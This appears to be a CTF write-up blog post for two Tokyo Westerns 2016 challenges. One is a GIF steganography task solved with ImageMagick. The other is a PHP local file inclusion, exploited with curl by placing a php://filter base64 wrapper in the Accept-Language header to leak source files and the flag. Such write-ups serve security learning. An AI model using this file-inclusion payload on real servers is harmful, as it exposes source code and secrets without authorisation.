TWCTF{Write_up} -Tokyo Westerns/MMA CTF 2nd 2016
Glance- 50 pt
We are given a Gif file and said that the flag is inside .(You found the challenging task here ) .Trying to investigate through the Stegosolve tool .
We have 201 frame let's extract them .
convert glance.gif flag.png
The picture is spliced into pieces ,every piece has a part of the flag.Let's merge the pieces to get the flag.
montage flag-*.png \-title x1 -shadow -geometry +1+1 \myflag.png
At the first sight ,it looks like LFI vulnerabilityGlobal page- 50 pt
curl http://globalpage.chal.ctf.westerns.tokyo/?page=index.php<!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <br /> <b>Notice</b>: Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br /> <p> <br /> <b>Warning</b>: include(indexphp/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br /> <br /> <b>Warning</b>: include(): Failed opening 'indexphp/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br /> </p> </body> </html>using php wrappers :D (php filtre is my besty)
curl -H "accept-language:/filter/convert.base64-encode/resource=index" http://globalpage.chal.ctf.westerns.tokyo/?page=php:Resposne from the server
<!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <p> PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p> </body> </html>Decode the script
<?php if (!defined('INCLUDED_INDEX')) { define('INCLUDED_INDEX', true); ini_set('display_errors', 1); include "flag.php"; ?> <!doctype html> <html> <head> <meta charset=utf-8> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> <?php $dir = ""; if(isset($_GET['page'])) { $dir = str_replace(['.', '/'], '', $_GET['page']); } if(empty($dir)) { ?> <ul> <li><a href="/?page=tokyo">Tokyo</a></li> <li><del>Westerns</del></li> <li><a href="/?page=ctf">CTF</a></li> </ul> <?php } else { foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) { $l = trim(explode(";", $lang)[0]); ?> <p<?=($l==='he')?" class=rtl":""?>> <?php include "$dir/$l.php"; ?> </p> <?php } } ?> </body> </html> <?php } ?>curl -H "accept-language:/filter/convert.base64-encode/resource=flag" http://globalpage.chal.ctf.westerns.tokyo/?page=php:we received the flag content
<html> <head> <title>Global Page</title> <style> .rtl { direction: rtl; } </style> </head> <body> PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==<br /> </body> </html>Now ,Decode with base64
echo "PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==" | base64 -d
Share story
0 comments: